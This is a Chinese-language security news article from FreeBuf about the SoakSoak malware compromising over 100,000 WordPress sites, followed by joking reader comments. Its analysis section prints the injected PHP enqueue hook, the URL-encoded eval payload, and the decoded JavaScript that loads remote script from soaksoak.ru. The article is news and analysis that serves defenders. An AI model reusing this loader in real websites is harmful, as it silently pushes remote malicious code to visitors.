10万WordPress网站沦陷:恶意软件SoakSoak来了

2014-12-16 +5 370578人围观 ,发现 22 个不明物体 资讯

WordPress是一款使用PHP语言开发的博客平台,用户架设属于自己的博客,也可以把 WordPress当作一个内容管理系统(CMS)来使用。近几个月,WordPress安全漏洞事件频发,包括    免费主题暗藏后门,波及WordPress等知名CMS系统WordPress 4.0以下版本存在跨站脚本漏洞而现在,一款广泛传播的恶意软件已经感染了100,000多个WordPress网站,而且数字仍在增加。

Google将超过11,000个域名纳入黑名单

消息先是周日早上在WordPress社区传播,起因是Google将超过11,000域名列入黑名单,这些网站都被一款最新的恶意软件攻击,软件来源于SoakSoak.ru,所以起名为SoakSoak 恶意软件。由于现在互联网上有超过7千万网站使用WordPress,所以这样的恶意软件影响巨大。

一经感染,网站就会出现异常行为,包括重定向到SoakSoak.ru。访问网站的用户也可能会自动下载恶意程序。Google已经将11,000个可能已经感染病毒的网站列入黑名单。


恶意软件分析

恶意软件SoakSoak会修改wp-includes/template-loader.php文件

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts",'FuncQueueObject');

这样使得wp-includes/js/swobject.js文件会在每一个页面上加载,这个swobject.js文件包含加密的恶意js代码。

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

解密后的代码:

eval(decodeURIComponent('(
function()
{
    //var ua = navigator.userAgent.toLowerCase();
    //if (ua.indexOf('chrome') != -1) return;
    var head=document.getElementsByTagName('head')[0];
    var script=document.createElement('script');
    script.type='text/javascript';
    script.src='http://soaksoak.ru/xteas/code';
    script.id='xxyyzz_petushok';
    head.appendChild(script);
}()
);'));

恶意代码一旦被解密,就会加载SoakSoak.ru域名中的js:hxxp://soaksoak.ru/xteas/code

检测与预防
目前尚不清楚病毒是如何感染网站的。如果你正在使用WordPress,并且你担心你的网站被感染,Sucuri公司提供了免费网站扫描,你可以检测你的网站是否感染了病毒。

想要让你的WordPress更加安全,可参见:如何为WordPress做安全防护?

[参考来源THN & Sucuri,译/Sphinx,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

相关推荐

数以百计基于WordPress, Joomla 和 CodeIgniter的网站感染ionCube恶意软件

Pastebin Hacking新姿势:使用jQuery替换进行恶意软件传播

WordPress再悲剧:WPcache-Blogger感染事件影响五万WordPress网站

恶意软件新玩法:隐匿在Pastebin上的后门

小心访问:WordPress平台网站正受到攻击

恶意软件Soaksoak卷土重来?小心你的wordpress网站

RevSlider插件漏洞导致大量WordPress网站被黑

数千Linux和FreeBSD服务器感染Mumblehard恶意软件

这些评论亮了

  • cnseay 回复
    记者:大爷,您幸福吗?
    大爷:幸福,幸福!
    记者:大爷,你这么幸福,为什么还要黑seay呢?
    大爷:人品差
    记者:大妈,您幸福吗?
    大妈:俺老伴幸福我就性福!
    记者:那大妈您既然这么幸福,为什么也黑seay呢?
    大妈:人品差
    记者:哎~这美女,您听说过seay吗?
    美女:谁不认识啊!
    记者:那您觉得他人品差之外,还有什么优点吗?
    美女:人品差
    记者:帅哥,您幸福吗?
    帅哥:seay幸福我就幸福!(一脸猥笑)
    记者:(高兴地一跳)终于找到粉丝团了!那么帅哥,您觉得seay给了您什么幸福呢?
    帅哥:人品差的人我喜欢,所以我幸福!
    记者:seay可是94年耶,你们为什么要黑他呢?
    群众:人品差
    记者:不仅94年,还P7耶,你们为什么还要黑他呢?
    群众:人品差
    记者:不仅94年P7,而且还会挖洞呢!你们为什么为什么还要黑他呢??
    全国人民:人品差
    )80( 亮了
  • cnseay马甲 回复
    @ cnseay
    记者:大爷,您听说过安利吗?
    大爷:嗯?什么玩意?
    记者:那大爷,您听说过seay吗?
    大爷:卧槽!那愣娃,人品撮得嘿魂,******,就那雕,***
    记者:大爷,您的出口话被过滤了
    大爷:************ ***** ****** *******
    记者:那大爷,那么多人黑seay是不是因为嫉妒羡慕恨呢?
    大爷:麻辣隔壁!那愣娃子哟,有啥值碟羡慕的咯,我嫉妒个锤子哟!!****
    记者:哇,大爷也是粉丝团的呀!那大爷,您能用一句普通话来表达您的爱慕之情吗?
    大爷:滚犊子,你个辣鸡,人品戳就某出来装的啦,低调你懂不懂,你懂吗?不懂就要问啊,你懂不懂?你不懂吧?既然你都不懂你还问个毛线哪???
    )9( 亮了
发表评论

已有 22 条评论

表情插图
取消
Loading...
Sphinx

这家伙太懒了,什么都没写

410 文章数 96 评论数

最近文章

BUF 早餐铺 | Facebook再曝数据丑闻:1.2亿用户数据面临泄露风险;自2012年以来,所有Android设备都受到RAMpage漏洞的影响;Gentoo GitHub镜像被黑客攻击

2018.07.02

BUF 早餐铺 | WebAssembly的修改会使得Meltdown和Spectre补丁失效;英国税务局记录了510万英国人的声音;苹果回应iPhone密码被暴力破解:测试是错误的

2018.06.26

快讯 | 黑龙江高考查分官网瘫痪,查询入口被微信封锁

2018.06.25

浏览更多

相关阅读

特别推荐

推荐关注

活动预告

填写个人信息

姓名
电话
邮箱
公司
行业
职位

本站由阿里云 提供计算与安全服务

用户服务

企业服务

合作信息

关于我们

赞助商

FreeBuf+小程序

扫码把安全装进口袋

Copyright © 2019 WWW.FREEBUF.COM All Rights Reserved  沪ICP备13033796号

css.php